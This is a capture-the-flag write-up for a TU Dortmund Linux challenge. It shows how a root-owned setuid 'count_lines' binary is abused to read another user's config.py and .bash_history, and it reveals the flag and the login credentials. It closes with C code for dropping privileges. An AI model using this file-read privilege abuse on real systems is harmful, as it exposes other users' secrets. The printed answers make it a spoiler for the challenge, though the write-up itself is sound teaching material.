Hey, look at my essay!

Description

We have provided SSH access to a Linux system for you. You reach it via sfl.cs.tu-dortmund.de on port 10007. Credentials: sfl / buffer_overflow. Now go connect to it and have a look around. You may find some strange files...

Hint: c3NoIHNmbEBzZmwuY3MudHUtZG9ydG11bmQuZGUgLXAgMTAwMDcgLVA=

Solution

Login to the server.

Then we can take a look around. There is a folder "Desktop", inside it a folder "essays", and in there a "util" folder with some binary files:

sfl@c9bea22563ec:/home/sfl/Desktop/essays/util$ ls -al
# total 68
# drwxr-xr-x 2 root root  4096 Jan 10 12:27 .
# drwxr-xr-x 3 root root  4096 Jan  8 17:29 ..
# -rwxr-xr-x 1 www  www  17104 Jan  8 17:27 count_chars
# -rwsr-xr-x 1 root root 17144 Jan  9 20:29 count_lines
# -rwxr-xr-x 1 www  www  17048 Jan  7 10:46 count_words

Also there is an additional user folder at "/home/www/" with the following files:

sfl@c9bea22563ec:/home/www$ ls -al
# total 36
# drwxr-xr-x 4 www  www  4096 Jan 10 12:22 .
# drwxr-xr-x 4 root root 4096 Jan 12 15:33 ..
# -rw------- 1 www  www   804 Jan  9 20:38 .bash_history
# -rw-r--r-- 1 www  www   220 Jan  8 15:29 .bash_logout
# -rw-r--r-- 1 www  www  3526 Jan  8 15:29 .bashrc
# drwxr-xr-x 3 www  www  4096 Jan  8 16:53 .local
# -rw-r--r-- 1 www  www   807 Jan  8 15:29 .profile
# drwxr-xr-x 2 www  www  4096 Jan  9 15:41 __pycache__
# -rwxr----- 1 www  www   199 Jan  9 15:41 config.py

Unfortunately, as user sfl we are unable to open any of these files.

But if you look back at the files in the "util" folder, there is something odd (try it yourself before scrolling further).




...












Did you try it?
...




It's not that hard
...







One file has something different
...

























---
...
   🠗
-rwsr-xr-x 1 root root 17144 Jan  9 20:29 count_lines
   🠕

The binary is owned by user root and has the setuid bit set! Whoever executes it gets root's effective user ID for the lifetime of the process, so every file the program opens is opened with root's permissions rather than ours. In other words, count_lines lets us read anything root can read.

So let's take a look at the config.py file:

sfl@c9bea22563ec:/home/sfl$ /home/sfl/Desktop/essays/util/count_lines /home/www/config.py
# from flask import Flask
# import os
#
# app = Flask(__name__)
#
# @app.route("/66041164-0c4e-4f23-8ef1-7b6856c5e32d")
# def hello_world():
#     FLAG = str(os.environ.get('WWW_FLAG'))
#     return "<p>" + FLAG + "</p>"
#
# 7 lines written

So the flag must be set somewhere in the environment of the running server. But our tool can only read files. Let's try another file: maybe the "www" user set the flag variable via the terminal? All commands entered into the terminal are saved in the ".bash_history" file, and if we open it, there it is. The final command is:

/home/sfl/Desktop/essays/util/count_lines /home/www/.bash_history
# ls
# export WWW_FLAG=fl4g{b3_c4r3ful_w1th_suid_bit}
# printenv
# ls
# python3 config.py
# apt install python3-pip
# sudo apt install python3-pip
# ...

Another possible approach is to read the environment variable from the place where config.py uses it. The config file starts a Flask app (Flask is a Python web framework), so /66041164-0c4e-4f23-8ef1-7b6856c5e32d is probably a route of a web app running on this system. To access it, we just need to request that URL. For the hostname we can use localhost or 127.0.0.1 (both point directly to the system the request is sent from). Inside the SSH session, curl does the job:

curl http://localhost/66041164-0c4e-4f23-8ef1-7b6856c5e32d

The response of the running Flask server contains the flag:

<p>fl4g{b3_c4r3ful_w1th_suid_bit}</p>
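The flag says it all: be careful with the suid bit. As an added example (not the challenge's own count_lines binary), here is how such a tool can be written so that a setuid bit on it does not turn it into a root-level file reader: before touching the caller-supplied path, it drops back to the caller's real uid/gid so the kernel checks the open against the caller's permissions. It assumes Linux with glibc (setresuid/setresgid, fmemopen); the in-memory helper exists only so the counting logic can be exercised without a file.

```c
#define _GNU_SOURCE   /* setresuid/setresgid and fmemopen on glibc */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Permanently give up what the setuid bit granted: real, effective and saved
 * ids all become the invoking user's, so every open() after this call is
 * checked against that user's permissions, not root's. 0 on success. */
int drop_privileges(void) {
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setresgid(rgid, rgid, rgid) != 0) return -1;  /* group before user */
    if (setresuid(ruid, ruid, ruid) != 0) return -1;
    /* Do not trust the return codes alone: confirm the drop took effect. */
    return (geteuid() == ruid && getegid() == rgid) ? 0 : -1;
}

/* Count newline characters in an open stream; this is the number the tool
 * reports as "lines written". */
long count_newlines(FILE *f) {
    long n = 0;
    for (int c; (c = fgetc(f)) != EOF; )
        if (c == '\n') n++;
    return n;
}

/* Same counter over an in-memory buffer (constructed input for offline checks). */
long count_lines_in_text(const char *text) {
    FILE *f = fmemopen((void *)text, strlen(text), "r");
    if (!f) return -1;
    long n = count_newlines(f);
    fclose(f);
    return n;
}

int main(int argc, char **argv) {
    if (argc != 2) { fprintf(stderr, "usage: %s FILE\n", argv[0]); return 2; }
    if (drop_privileges() != 0) { perror("drop_privileges"); return 1; }
    FILE *f = fopen(argv[1], "r");   /* now checked against the caller's uid */
    if (!f) { perror(argv[1]); return 1; }  /* e.g. EACCES on /home/www/.bash_history */
    printf("%ld lines written\n", count_newlines(f));
    fclose(f);
    return 0;
}
```

With privileges dropped, the binary can still carry the suid bit without granting anything; the cleaner fix is of course not to make a file-reading utility setuid root in the first place.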